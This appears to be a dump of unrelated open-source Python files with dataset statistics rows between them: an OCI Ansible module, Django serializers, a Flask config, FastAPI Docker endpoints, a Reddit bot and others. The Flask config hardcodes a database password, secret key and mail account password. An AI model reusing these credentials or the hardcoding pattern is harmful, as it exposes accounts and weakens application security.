Possible values: YES if the role was granted commonly (CONTAINER=ALL was used) NO if the role was granted locally (CONTAINER=ALL was not used)" returned: on success type: str sample: YES inherited: description: - Indicates whether the role grant was inherited from another container (YES) or not (NO) returned: on success type: str sample: YES sample: [{ "name": "name_example", "schema_type": "schema_type_example", "owner": "owner_example", "grantor": "grantor_example", "hierarchy": "YES", "object": "object_example", "grant_option": "YES", "common": "YES", "inherited": "YES" }] """ from ansible.module_utils.basic import AnsibleModule from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import ( OCIResourceFactsHelperBase, get_custom_class, ) try: from oci.database_management import DbManagementClient HAS_OCI_PY_SDK = True except ImportError: HAS_OCI_PY_SDK = False class ObjectPrivilegeFactsHelperGen(OCIResourceFactsHelperBase): """Supported operations: list""" def get_required_params_for_list(self): return [ "managed_database_id", "user_name", ] def list_resources(self): optional_list_method_params = [ "name", "sort_by", "sort_order", ] optional_kwargs = dict( (param, self.module.params[param]) for param in optional_list_method_params if self.module.params.get(param) is not None ) return oci_common_utils.list_all_resources( self.client.list_object_privileges, managed_database_id=self.module.params.get("managed_database_id"), user_name=self.module.params.get("user_name"), **optional_kwargs ) ObjectPrivilegeFactsHelperCustom = get_custom_class("ObjectPrivilegeFactsHelperCustom") class ResourceFactsHelper( ObjectPrivilegeFactsHelperCustom, ObjectPrivilegeFactsHelperGen ): pass def main(): module_args = oci_common_utils.get_common_arg_spec() module_args.update( dict( managed_database_id=dict(type="str", required=True), user_name=dict(type="str", required=True), name=dict(type="str"), sort_by=dict(type="str", choices=["NAME"]), sort_order=dict(type="str", choices=["ASC", "DESC"]), ) ) module = AnsibleModule(argument_spec=module_args) if not HAS_OCI_PY_SDK: module.fail_json(msg="oci python sdk required for this module.") resource_facts_helper = ResourceFactsHelper( module=module, resource_type="object_privilege", service_client_class=DbManagementClient, namespace="database_management", ) result = [] if resource_facts_helper.is_list(): result = resource_facts_helper.list() else: resource_facts_helper.fail() module.exit_json(object_privileges=result) if __name__ == "__main__": main()
30.92887
133
0.626759
822
7,392
5.453771
0.284672
0.029668
0.037921
0.046844
0.274593
0.228418
0.154584
0.147223
0.116663
0.073388
0
0.004805
0.296131
7,392
238
134
31.058824
0.856813
0.05533
0
0.265
0
0.015
0.648114
0.03242
0
0
0
0
0
1
0.015
false
0.005
0.03
0.005
0.065
0.005
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e68c436db086a9f75f4ec9a1c59f8bdd8afa7f45
1,028
py
Python
src/simple_report/xls/document.py
glibin/simple-report
1e68b2fe568d6f7a7d9332d0e83b9a21661419e0
[ "Apache-2.0" ]
null
null
null
src/simple_report/xls/document.py
glibin/simple-report
1e68b2fe568d6f7a7d9332d0e83b9a21661419e0
[ "Apache-2.0" ]
null
null
null
src/simple_report/xls/document.py
glibin/simple-report
1e68b2fe568d6f7a7d9332d0e83b9a21661419e0
[ "Apache-2.0" ]
null
null
null
#coding: utf-8

import xlrd

from simple_report.core.document_wrap import BaseDocument, SpreadsheetDocument
from simple_report.xls.workbook import Workbook
from simple_report.xls.output_options import XSL_OUTPUT_SETTINGS


class DocumentXLS(BaseDocument, SpreadsheetDocument):
    """
    Обертка для отчетов в формате XLS
    """

    def __init__(self, ffile, tags=None, **kwargs):
        self.file = ffile
        self._workbook = Workbook(ffile, **kwargs)

    @property
    def workbook(self):
        """
        Получение рабочей книги
        :result: рабочая книга
        """
        return self._workbook

    def build(self, dst):
        """
        Сборка отчета
        :param dst: путь до выходного файла
        :result:
        """
        self._workbook.build(dst)

    def __setattr__(self, key, value):
        if key in XSL_OUTPUT_SETTINGS:
            setattr(self._workbook, key, value)
        else:
            super(DocumentXLS, self).__setattr__(key, value)
25.7
79
0.614786
109
1,028
5.568807
0.53211
0.079077
0.079077
0.062603
0
0
0
0
0
0
0
0.001389
0.299611
1,028
39
80
26.358974
0.841667
0.150778
0
0
0
0
0
0
0
0
0
0
0
1
0.222222
false
0
0.222222
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e692cff5589dc59f4785c76fbfa11c53ff5a1d4e
305
py
Python
setup.py
arokem/afq-deep-learning
61d7746f03914d63c56253d10d0f6a21e6c78e90
[ "BSD-3-Clause" ]
null
null
null
setup.py
arokem/afq-deep-learning
61d7746f03914d63c56253d10d0f6a21e6c78e90
[ "BSD-3-Clause" ]
null
null
null
setup.py
arokem/afq-deep-learning
61d7746f03914d63c56253d10d0f6a21e6c78e90
[ "BSD-3-Clause" ]
2
2021-12-01T17:04:39.000Z
2022-01-20T22:53:40.000Z
from setuptools import find_packages, setup

setup(
    name='src',
    packages=find_packages(),
    version='0.1.0',
    description='This repository hosts some work-in-progress experiments applying deep learning to predict age using tractometry data.',
    author='Joanna Qiao',
    license='BSD-3',
)
27.727273
136
0.718033
40
305
5.425
0.875
0.110599
0
0
0
0
0
0
0
0
0
0.015873
0.17377
305
10
137
30.5
0.845238
0
0
0
0
0
0.462295
0
0
0
0
0
0
1
0
true
0
0.111111
0
0.111111
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
e6960adb05d4b964e50fe6cceef1e01091d1811d
2,327
py
Python
FusionIIIT/applications/placement_cell/api/serializers.py
29rj/Fusion
bc2941a67532e183adeb0bc4042df0b182b9e3aa
[ "bzip2-1.0.6" ]
29
2019-02-20T15:35:33.000Z
2022-03-22T11:10:57.000Z
FusionIIIT/applications/placement_cell/api/serializers.py
29rj/Fusion
bc2941a67532e183adeb0bc4042df0b182b9e3aa
[ "bzip2-1.0.6" ]
409
2019-01-17T19:30:51.000Z
2022-03-31T16:28:45.000Z
FusionIIIT/applications/placement_cell/api/serializers.py
29rj/Fusion
bc2941a67532e183adeb0bc4042df0b182b9e3aa
[ "bzip2-1.0.6" ]
456
2019-01-12T11:01:13.000Z
2022-03-30T17:06:52.000Z
from rest_framework.authtoken.models import Token from rest_framework import serializers from applications.placement_cell.models import (Achievement, Course, Education, Experience, Has, Patent, Project, Publication, Skill, PlacementStatus, NotifyStudent) class SkillSerializer(serializers.ModelSerializer): class Meta: model = Skill fields = ('__all__') class HasSerializer(serializers.ModelSerializer): skill_id = SkillSerializer() class Meta: model = Has fields = ('skill_id','skill_rating') def create(self, validated_data): skill = validated_data.pop('skill_id') skill_id, created = Skill.objects.get_or_create(**skill) try: has_obj = Has.objects.create(skill_id=skill_id,**validated_data) except: raise serializers.ValidationError({'skill': 'This skill is already present'}) return has_obj class EducationSerializer(serializers.ModelSerializer): class Meta: model = Education fields = ('__all__') class CourseSerializer(serializers.ModelSerializer): class Meta: model = Course fields = ('__all__') class ExperienceSerializer(serializers.ModelSerializer): class Meta: model = Experience fields = ('__all__') class ProjectSerializer(serializers.ModelSerializer): class Meta: model = Project fields = ('__all__') class AchievementSerializer(serializers.ModelSerializer): class Meta: model = Achievement fields = ('__all__') class PublicationSerializer(serializers.ModelSerializer): class Meta: model = Publication fields = ('__all__') class PatentSerializer(serializers.ModelSerializer): class Meta: model = Patent fields = ('__all__') class NotifyStudentSerializer(serializers.ModelSerializer): class Meta: model = NotifyStudent fields = ('__all__') class PlacementStatusSerializer(serializers.ModelSerializer): notify_id = NotifyStudentSerializer() class Meta: model = PlacementStatus fields = ('notify_id', 'invitation', 'placed', 'timestamp', 'no_of_days')
27.376471
89
0.644607
200
2,327
7.215
0.34
0.198198
0.106722
0.218295
0.24948
0
0
0
0
0
0
0
0.270735
2,327
84
90
27.702381
0.850324
0
0
0.333333
0
0
0.072626
0
0
0
0
0
0
1
0.016667
false
0
0.05
0
0.483333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6a0c4454894632f570e8f7308cb8d060eed1f45
767
py
Python
modtox/Helpers/helpers.py
danielSoler93/modtox
757234140cc780f57d031b46d9293fc2bf95d18d
[ "Apache-2.0" ]
4
2019-09-22T22:57:30.000Z
2020-03-18T13:20:50.000Z
modtox/Helpers/helpers.py
danielSoler93/ModTox
757234140cc780f57d031b46d9293fc2bf95d18d
[ "Apache-2.0" ]
21
2019-09-16T11:07:13.000Z
2019-11-20T15:06:06.000Z
modtox/Helpers/helpers.py
danielSoler93/ModTox
757234140cc780f57d031b46d9293fc2bf95d18d
[ "Apache-2.0" ]
2
2019-09-07T17:07:55.000Z
2020-03-18T13:20:52.000Z
import os


def retrieve_molecule_number(pdb, resname):
    """
    IDENTIFICATION OF MOLECULE NUMBER BASED ON THE TER'S
    """
    count = 0
    with open(pdb, 'r') as x:
        lines = x.readlines()
    for i in lines:
        if i.split()[0] == 'TER':
            count += 1
        if i.split()[3] == resname:
            molecule_number = count + 1
            break
    return molecule_number


class cd:
    """Context manager for changing the current working directory"""
    def __init__(self, newPath):
        self.newPath = os.path.expanduser(newPath)

    def __enter__(self):
        self.savedPath = os.getcwd()
        os.chdir(self.newPath)

    def __exit__(self, etype, value, traceback):
        os.chdir(self.savedPath)
23.96875
68
0.573664
93
767
4.55914
0.580645
0.132075
0.037736
0
0
0
0
0
0
0
0
0.009542
0.316819
767
31
69
24.741935
0.799618
0.148631
0
0
0
0
0.006319
0
0
0
0
0
0
1
0.210526
false
0
0.052632
0
0.368421
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e6a5916da8516ca978c7505bb56075d47bacaa77
826
py
Python
tools/webcam/webcam_apis/nodes/__init__.py
ivmtorres/mmpose
662cb50c639653ae2fc19d3421ce10bd02246b85
[ "Apache-2.0" ]
1
2022-02-13T12:27:40.000Z
2022-02-13T12:27:40.000Z
tools/webcam/webcam_apis/nodes/__init__.py
ivmtorres/mmpose
662cb50c639653ae2fc19d3421ce10bd02246b85
[ "Apache-2.0" ]
null
null
null
tools/webcam/webcam_apis/nodes/__init__.py
ivmtorres/mmpose
662cb50c639653ae2fc19d3421ce10bd02246b85
[ "Apache-2.0" ]
null
null
null
# Copyright (c) OpenMMLab. All rights reserved.
from .builder import NODES
from .faceswap_nodes import FaceSwapNode
from .frame_effect_nodes import (BackgroundNode, BugEyeNode, MoustacheNode,
                                 NoticeBoardNode, PoseVisualizerNode,
                                 SaiyanNode, SunglassesNode)
from .helper_nodes import ModelResultBindingNode, MonitorNode, RecorderNode
from .mmdet_nodes import DetectorNode
from .mmpose_nodes import TopDownPoseEstimatorNode
from .xdwendwen_nodes import XDwenDwenNode

__all__ = [
    'NODES', 'PoseVisualizerNode', 'DetectorNode', 'TopDownPoseEstimatorNode',
    'MonitorNode', 'BugEyeNode', 'SunglassesNode', 'ModelResultBindingNode',
    'NoticeBoardNode', 'RecorderNode', 'FaceSwapNode', 'MoustacheNode',
    'SaiyanNode', 'BackgroundNode', 'XDwenDwenNode'
]
45.888889
78
0.74092
65
826
9.246154
0.476923
0.109817
0
0
0
0
0
0
0
0
0
0
0.175545
826
17
79
48.588235
0.882526
0.054479
0
0
0
0
0.263158
0.05905
0
0
0
0
0
1
0
false
0
0.466667
0
0.466667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6aa6635d278553660a8a5b50b4098367fae31a5
2,446
py
Python
composer/profiler/__init__.py
stanford-crfm/composer
4996fbd818971afd6439961df58b531d9b47a37b
[ "Apache-2.0" ]
null
null
null
composer/profiler/__init__.py
stanford-crfm/composer
4996fbd818971afd6439961df58b531d9b47a37b
[ "Apache-2.0" ]
null
null
null
composer/profiler/__init__.py
stanford-crfm/composer
4996fbd818971afd6439961df58b531d9b47a37b
[ "Apache-2.0" ]
null
null
null
# Copyright 2021 MosaicML. All Rights Reserved. """Performance profiling tools. The profiler gathers performance metrics during a training run that can be used to diagnose bottlenecks and facilitate model development. The metrics gathered include: * Duration of each :class:`.Event` during training * Time taken by the data loader to return a batch * Host metrics such as CPU, system memory, disk and network utilization over time * Execution order, latency and attributes of PyTorch operators and GPU kernels (see :doc:`profiler`) The following example demonstrates how to setup and perform profiling on a simple training run. .. literalinclude:: ../../../examples/profiler_demo.py :language: python :linenos: :emphasize-lines: 6, 27-49 It is required to specify an output ``profiler_trace_file`` during :class:`.Trainer` initialization to enable profiling. The ``profiler_trace_file`` will contain the profiling trace data once the profiling run completes. By default, the :class:`.Profiler`, :class:`.DataloaderProfiler` and :class:`.SystemProfiler` will be active. The :class:`.TorchProfiler` is **disabled** by default. To activate the :class:`.TorchProfiler`, the ``torch_profiler_trace_dir`` must be specified *in addition* to the ``profiler_trace_file`` argument. The ``torch_profiler_trace_dir`` will contain the Torch Profiler traces once the profiling run completes. The :class:`.Profiler` will automatically merge the Torch traces in the ``torch_profiler_trace_dir`` into the ``profiler_trace_file``, allowing users to view a unified trace. The complete traces can be viewed by in a Google Chrome browser navigating to ``chrome://tracing`` and loading the ``profiler_trace_file``. Here is an example trace file: .. image:: https://storage.googleapis.com/docs.mosaicml.com/images/profiler/profiler_trace_example.png :alt: Example Profiler Trace File :align: center Additonal details an be found in the Profiler Guide. """ from composer.profiler._event_handler import ProfilerEventHandler from composer.profiler._profiler import Marker, Profiler from composer.profiler._profiler_action import ProfilerAction # All needs to be defined properly for sphinx autosummary __all__ = [ "Marker", "Profiler", "ProfilerAction", "ProfilerEventHandler", ] Marker.__module__ = __name__ Profiler.__module__ = __name__ ProfilerAction.__module__ = __name__ ProfilerEventHandler.__module__ = __name__
44.472727
146
0.780867
326
2,446
5.665644
0.48773
0.070384
0.055225
0.043313
0.069302
0
0
0
0
0
0
0.004265
0.137367
2,446
54
147
45.296296
0.87109
0.822976
0
0
0
0
0.112941
0
0
0
0
0
0
1
0
false
0
0.230769
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6cd191f4e7eeaa1d075d528c9e2ada0827d674f
4,618
py
Python
HW2/dbsys-hw2/Database.py
yliu120/dbsystem
d1b008f411929058a34a1dd2c44c9ee2cf899865
[ "Apache-2.0" ]
null
null
null
HW2/dbsys-hw2/Database.py
yliu120/dbsystem
d1b008f411929058a34a1dd2c44c9ee2cf899865
[ "Apache-2.0" ]
null
null
null
HW2/dbsys-hw2/Database.py
yliu120/dbsystem
d1b008f411929058a34a1dd2c44c9ee2cf899865
[ "Apache-2.0" ]
null
null
null
import json, io, os, os.path from Catalog.Schema import DBSchema, DBSchemaEncoder, DBSchemaDecoder from Query.Plan import PlanBuilder from Storage.StorageEngine import StorageEngine class Database: """ A top-level database engine class. For now, this primarily maintains a simple catalog, mapping relation names to schema objects. Also, it provides the ability to construct query plan objects, as well as wrapping the storage layer methods. """ checkpointEncoding = "latin1" checkpointFile = "db.catalog" def __init__(self, **kwargs): other = kwargs.get("other", None) if other: self.fromOther(other) else: storageArgs = {k:v for (k,v) in kwargs.items() \ if k in ["pageSize", "poolSize", "dataDir", "indexDir"]} self.relationMap = kwargs.get("relations", {}) self.defaultPageSize = kwargs.get("pageSize", io.DEFAULT_BUFFER_SIZE) self.storage = kwargs.get("storage", StorageEngine(**storageArgs)) checkpointFound = os.path.exists(os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile)) restoring = "restore" in kwargs if not restoring and checkpointFound: self.restore() def fromOther(self, other): self.relationMap = other.relationMap self.defaultPageSize = other.defaultPageSize self.storage = other.storage def close(self): if self.storage: self.storage.close() # Database internal components def storageEngine(self): return self.storage def bufferPool(self): return self.storage.bufferPool if self.storage else None def fileManager(self): return self.storage.fileMgr if self.storage else None # User API # Catalog methods def relations(self): return self.relationMap.keys() def hasRelation(self, relationName): return relationName in self.relationMap def relationSchema(self, relationName): if relationName in self.relationMap: return self.relationMap[relationName] # DDL statements def createRelation(self, relationName, relationFields): if relationName not in self.relationMap: schema = DBSchema(relationName, relationFields) self.relationMap[relationName] = schema self.storage.createRelation(relationName, schema) self.checkpoint() else: raise ValueError("Relation '" + relationName + "' already exists") def removeRelation(self, relationName): if relationName in self.relationMap: del self.relationMap[relationName] self.storage.removeRelation(relationName) self.checkpoint() else: raise ValueError("No relation '" + relationName + "' found in database") # DML statements # Returns a tuple id for the newly inserted data. def insertTuple(self, relationName, tupleData): if relationName in self.relationMap: return self.storage.insertTuple(relationName, tupleData) else: raise ValueError("Unknown relation '" + relationName + "' while inserting a tuple") def deleteTuple(self, tupleId): self.storage.deleteTuple(tupleId) def updateTuple(self, tupleId, tupleData): self.storage.updateTuple(tupleId, tupleData) # Queries # Returns an empty query builder that can access the current database. def query(self): return PlanBuilder(db=self) # Returns an iterable for query results, after initializing the given plan. def processQuery(self, queryPlan): return queryPlan.prepare(self) # Save the database internals to the data directory. def checkpoint(self): if self.storage: dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile) with open(dbcPath, 'w', encoding=Database.checkpointEncoding) as f: f.write(self.pack()) # Load relations and schema from an existing data directory. 
def restore(self): if self.storage: dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile) with open(dbcPath, 'r', encoding=Database.checkpointEncoding) as f: other = Database.unpack(f.read(), self.storage) self.fromOther(other) # Database schema catalog serialization def pack(self): if self.relationMap is not None: return json.dumps([self.relationMap, self.defaultPageSize], cls=DBSchemaEncoder) @classmethod def unpack(cls, buffer, storageEngine): (relationMap, pageSize) = json.loads(buffer, cls=DBSchemaDecoder) return cls(relations=relationMap, pageSize=pageSize, storage=storageEngine, restore=True) if __name__ == "__main__": import doctest doctest.testmod()
31.848276
107
0.707016
524
4,618
6.204198
0.311069
0.067671
0.019994
0.035681
0.177176
0.121193
0.121193
0.076592
0.076592
0.059059
0
0.000271
0.19987
4,618
144
108
32.069444
0.879567
0.145518
0
0.177778
0
0
0.049578
0
0
0
0
0
0
1
0.222222
false
0
0.055556
0.077778
0.433333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e6ce056f0a84e4b655921e3c42a24774c81e07e4
619
py
Python
moderngl_window/resources/data.py
DavideRuzza/moderngl-window
e9debc6ed4a1899aa83c0da2320e03b0c2922b80
[ "MIT" ]
142
2019-11-11T23:14:28.000Z
2022-03-29T08:37:03.000Z
moderngl_window/resources/data.py
DavideRuzza/moderngl-window
e9debc6ed4a1899aa83c0da2320e03b0c2922b80
[ "MIT" ]
107
2019-10-31T20:31:45.000Z
2022-03-23T15:01:41.000Z
moderngl_window/resources/data.py
DavideRuzza/moderngl-window
e9debc6ed4a1899aa83c0da2320e03b0c2922b80
[ "MIT" ]
36
2019-12-12T16:14:10.000Z
2022-01-18T22:58:21.000Z
""" Registry general data files """ from typing import Any from moderngl_window.resources.base import BaseRegistry from moderngl_window.meta import DataDescription class DataFiles(BaseRegistry): """Registry for requested data files""" settings_attr = "DATA_LOADERS" def load(self, meta: DataDescription) -> Any: """Load data file with the configured loaders. Args: meta (:py:class:`~moderngl_window.meta.data.DataDescription`): the resource description Returns: Any: The loaded resource """ return super().load(meta) data = DataFiles()
23.807692
99
0.678514
69
619
6.014493
0.536232
0.101205
0.086747
0
0
0
0
0
0
0
0
0
0.227787
619
25
100
24.76
0.868201
0.390953
0
0
0
0
0.037736
0
0
0
0
0
0
1
0.125
false
0
0.375
0
0.875
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6d6837b46baf712793275d6754e0dab0bf209be
602
py
Python
baseline/ns-vqa/reason/options/test_options.py
robinzixuan/Video-Question-Answering-HRI
ae68ffee1e6fc1eb13229e457e3b8e3bc3a11579
[ "MIT" ]
52
2019-12-04T22:26:56.000Z
2022-03-31T17:04:15.000Z
reason/options/test_options.py
guxiwuruo/VCML
5a0f01a0baba238cef2f63131fccd412e3d7822b
[ "MIT" ]
6
2020-08-25T07:35:14.000Z
2021-09-09T04:57:09.000Z
reason/options/test_options.py
guxiwuruo/VCML
5a0f01a0baba238cef2f63131fccd412e3d7822b
[ "MIT" ]
5
2020-02-10T07:39:24.000Z
2021-06-23T02:53:42.000Z
from .base_options import BaseOptions


class TestOptions(BaseOptions):
    """Test Option Class"""

    def __init__(self):
        super(TestOptions, self).__init__()
        self.parser.add_argument('--load_checkpoint_path', required=True, type=str, help='checkpoint path')
        self.parser.add_argument('--save_result_path', required=True, type=str, help='save result path')
        self.parser.add_argument('--max_val_samples', default=None, type=int, help='max val data')
        self.parser.add_argument('--batch_size', default=256, type=int, help='batch_size')
        self.is_train = False
43
107
0.699336
79
602
5.050633
0.493671
0.100251
0.130326
0.210526
0.260652
0.135338
0
0
0
0
0
0.005929
0.159468
602
14
108
43
0.782609
0.028239
0
0
0
0
0.210345
0.037931
0
0
0
0
0
1
0.111111
false
0
0.111111
0
0.333333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6ddfeb2d231878165ecef38a814ab51e23d6978
412
py
Python
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 25 15:46:32 2019

@author: tadahaya
"""
from .binom import BT
from .connect import Connect
from .fet import FET
from .gsea import GSEA
from .ssgsea import ssGSEA

__copyright__ = 'Copyright (C) 2020 MIZUNO Tadahaya'
__version__ = '1.0.3'
__license__ = 'MIT'
__author__ = 'MIZUNO Tadahaya'
__author_email__ = '[email protected]'
22.888889
56
0.662621
54
412
4.666667
0.648148
0.111111
0
0
0
0
0
0
0
0
0
0.062893
0.228155
412
18
57
22.888889
0.72956
0.186893
0
0
0
0
0.241158
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6e370a3613328a0a9c46c0e262a69e05fcae601
355
py
Python
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
748
2018-05-02T17:12:53.000Z
2022-03-26T04:44:44.000Z
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
352
2018-05-02T19:05:59.000Z
2022-02-25T16:54:27.000Z
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
193
2018-05-02T17:14:56.000Z
2022-02-24T21:10:56.000Z
#!/usr/bin/env python3

import importlib
import os


# automatically import any Python files in the models/ directory
for file in sorted(os.listdir(os.path.dirname(__file__))):
    if file.endswith(".py") and not file.startswith("_"):
        model_name = file[: file.find(".py")]
        importlib.import_module("pytorch_translate.models." + model_name)
29.583333
73
0.712676
49
355
4.979592
0.673469
0.122951
0
0
0
0
0
0
0
0
0
0.003333
0.15493
355
11
74
32.272727
0.81
0.23662
0
0
0
0
0.118959
0.092937
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6e3cdee410d18c73bf42cae95012d7ea773e4ae
808
py
Python
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
2
2020-05-08T15:58:44.000Z
2020-05-09T19:36:34.000Z
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
null
null
null
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-

__author__ = '带土'

SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:[email protected]:3306/awesome'

SECRET_KEY = '\x88D\xf09\x91\x07\x98\x89\x87\x96\xa0A\xc68\xf9\xecJ:U\x17\xc5V\xbe\x8b\xef\xd7\xd8\xd3\xe6\x98*4'

# Email 配置
MAIL_SERVER = 'smtp.exmail.qq.com'
MAIL_PORT = 465
MAIL_USE_SSL = True
MAIL_USE_TSL = False
MAIL_USERNAME = '[email protected]'
MAIL_PASSWORD = 'Bmwzy1314520'
MAIL_SUBJECT_PREFIX = '[鱼书]'
MAIL_SENDER = '鱼书 <[email protected]>'

# 开启数据库查询性能测试
SQLALCHEMY_RECORD_QUERIES = True

# 性能测试的阀值
DATABASE_QUERY_TIMEOUT = 0.5

SQLALCHEMY_TRACK_MODIFICATIONS = True

WTF_CSRF_CHECK_DEFAULT = False

SQLALCHEMY_ECHO = True

from datetime import timedelta
REMEMBER_COOKIE_DURATION = timedelta(days=30)

PROXY_API = 'http://ip.yushu.im/get'

# PERMANENT_SESSION_LIFETIME = 3600
22.444444
113
0.762376
125
808
4.664
0.792
0.036021
0.041166
0
0
0
0
0
0
0
0
0.087258
0.106436
808
35
114
23.085714
0.720222
0.10396
0
0
0
0.052632
0.335655
0.208914
0
0
0
0
0
1
0
false
0.052632
0.052632
0
0.052632
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e6e54d8b26245cebf1276442b433cc49edf1fc78
762
py
Python
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
from typing import Any, List, Callable

from fastapi import APIRouter, HTTPException, status, BackgroundTasks

from app import schemas
from app.core import docker_client
import json
from copy import deepcopy

router = APIRouter()


@router.get("/images", response_model=schemas.DockerImageRespond)
def get_docker_image() -> Any:
    images_list = docker_client.images.list(all=True)
    return {
        'images': [
            {'id': image.short_id, 'tags': image.tags} for image in images_list if image.tags
        ]
    }


@router.get("/volumes", response_model=schemas.DockerVolumeRespond)
def get_docker_volume() -> Any:
    volumes_list = docker_client.volumes.list()
    return {
        'volumes': [{'id': volume.short_id, 'name': volume.name} for volume in volumes_list]
    }
28.222222
99
0.732283
100
762
5.43
0.4
0.066298
0.073665
0
0
0
0
0
0
0
0
0
0.153543
762
26
100
29.307692
0.84186
0
0
0.105263
0
0
0.052493
0
0
0
0
0
0
1
0.105263
false
0
0.315789
0
0.526316
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6eadd6e5aefadc0d052f84f6f0acadbd4bc7e84
440
py
Python
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
""" Your module description """ """ this is my second py code for my second lecture """ #print ('hello world') # this is a single line commment # this is my second line comment #print(type("123.")) #print ("Hello World".upper()) #print("Hello World".lower()) #print("hello" + "world" + ".") #print(2**3) #my_str = "hello world" #print(my_str) #my_str = "Tom" #print(my_str) my_int = 2 my_float = 3.0 print(my_int + my_float)
12.941176
56
0.638636
70
440
3.9
0.428571
0.18315
0.21978
0.102564
0
0
0
0
0
0
0
0.022161
0.179545
440
34
57
12.941176
0.734072
0.656818
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6ee7c4e821041f353c4df40b51b9e9fed815d11
325
py
Python
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
#!/usr/bin/python
import praw

reddit = praw.Reddit('mob-secondbot')
subreddit = reddit.subreddit("learnpython")

for submission in subreddit.hot(limit=5):
    print("Title: ", submission.title)
    print("Text: ", submission.selftext)
    print("Score: ", submission.score)
    print("---------------------------------\n")
25
48
